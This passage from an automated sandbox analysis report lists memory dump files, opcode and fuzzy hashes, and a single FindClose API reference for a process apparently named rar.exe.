                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                • Instruction ID: 2bf7ecc6072a709325cd3ee31bc56eaa12c0e6db44310fe86dd3558db90a72c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80E04F91F2A32281ED5D3F2318F107982402F5AB80E9C5438CC1E06382DC2FA455A621
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF754287A8C), ref: 00007FF754264549
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000004D.00000002.2350435810.00007FF754241000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF754240000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350400526.00007FF754240000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350493933.00007FF7542B0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350531475.00007FF7542C8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350568728.00007FF7542C9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542CA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542D4000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542DE000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350597587.00007FF7542E6000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350749934.00007FF7542E8000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000004D.00000002.2350798129.00007FF7542EE000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_77_2_7ff754240000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                                • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                                • Instruction ID: 0130bfad65ffc5c4db8d6dc79401c7f2b4a2b8b1b5a5926060880f9065524a91
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FC02B21E018C180C5047B2F8CE50342111BF58739FD80330C23E051E0CF1944EB0310